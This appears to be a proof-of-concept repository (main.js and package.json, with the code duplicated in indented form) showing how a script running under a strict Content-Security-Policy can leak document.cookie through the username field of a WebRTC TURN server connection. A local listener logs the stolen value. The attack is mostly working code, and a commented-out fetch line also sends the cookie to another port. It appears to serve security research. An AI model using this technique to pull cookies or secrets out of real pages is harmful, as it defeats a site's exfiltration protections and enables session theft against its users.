MatthiasPortzel/main.js

## main.js
import express from "express";
import Turn from "node-turn";

//App serves user controlled HTML inside of a content security policy
//The app can run JS but shouldn't be able to "phone-home" to a remote server

//This is untrusted
const CODE = `<!DOCTYPE html>
<html>
<body>
<script>
//In the vulnerable scenario,
//Untrusted code has access to data like cookies that it needs to be able to use
//But shouldn't be able to send to a 3rd-party
const FLAG = document.cookie || "FLAG";

//This fails like it should.
//Also can't load images, etc.
//fetch("http://localhost:8002?" + FLAG).then(_ => console.log("Attacked!")).catch(_ => console.log("Blocked by CSP"));

//But you can establish a RTCPeerConnection to an untrusted server
new RTCPeerConnection({
    iceServers: [{
        urls: ["turn:127.0.0.1:3478"],
        //Username field has a max length of 128 bytes, but it's trivial to connect multiple times
        username: FLAG.slice(0, 127),
        credential: "1"
    }],
    iceCandidatePoolSize: 1
});
</script>
</body>
</html>`;

const app = express();
app.get("/", (req, res) => {
    res.append("Content-Security-Policy", "default-src none; script-src 'unsafe-inline'")
    //This should be secure because the CSP should prevent connections
    res.send(CODE);
});
app.listen(8001, console.log)


//This is the "malicious" TURN server
var server = new Turn({
    authMech: 'none',
    debugLevel: "ALL",
    debug: function (debugLevel, msg) {
        if (msg instanceof Error) {
            throw msg;
        }
        // console.log(typeof msg);
        const match = msg.match(/username: (.*)/);
        if (match) {
            console.log("Got FLAG!");
            console.log(match[1]);
        }
    },
    credentials: {
        username: "password"
    },
    listeningIps: ["127.0.0.1"]
});
server.start();

## package.json
{
  "type": "module",
  "dependencies": {
    "express": "^4.17.2",
    "node-turn": "^0.0.6"
  }
}
	import express from "express";
	import Turn from "node-turn";

	//App serves user controlled HTML inside of a content security policy
	//The app can run JS but shouldn't be able to "phone-home" to a remote server

	//This is untrusted
	const CODE = `<!DOCTYPE html>
	<html>
	<body>
	<script>
	//In the vulnerable scenario,
	//Untrusted code has access to data like cookies that it needs to be able to use
	//But shouldn't be able to send to a 3rd-party
	const FLAG = document.cookie \|\| "FLAG";

	//This fails like it should.
	//Also can't load images, etc.
	//fetch("http://localhost:8002?" + FLAG).then(_ => console.log("Attacked!")).catch(_ => console.log("Blocked by CSP"));

	//But you can establish a RTCPeerConnection to an untrusted server
	new RTCPeerConnection({
	iceServers: [{
	urls: ["turn:127.0.0.1:3478"],
	//Username field has a max length of 128 bytes, but it's trivial to connect multiple times
	username: FLAG.slice(0, 127),
	credential: "1"
	}],
	iceCandidatePoolSize: 1
	});
	</script>
	</body>
	</html>`;

	const app = express();
	app.get("/", (req, res) => {
	res.append("Content-Security-Policy", "default-src none; script-src 'unsafe-inline'")
	//This should be secure because the CSP should prevent connections
	res.send(CODE);
	});
	app.listen(8001, console.log)


	//This is the "malicious" TURN server
	var server = new Turn({
	authMech: 'none',
	debugLevel: "ALL",
	debug: function (debugLevel, msg) {
	if (msg instanceof Error) {
	throw msg;
	}
	// console.log(typeof msg);
	const match = msg.match(/username: (.*)/);
	if (match) {
	console.log("Got FLAG!");
	console.log(match[1]);
	}
	},
	credentials: {
	username: "password"
	},
	listeningIps: ["127.0.0.1"]
	});
	server.start();
	{
	"type": "module",
	"dependencies": {
	"express": "^4.17.2",
	"node-turn": "^0.0.6"
	}
	}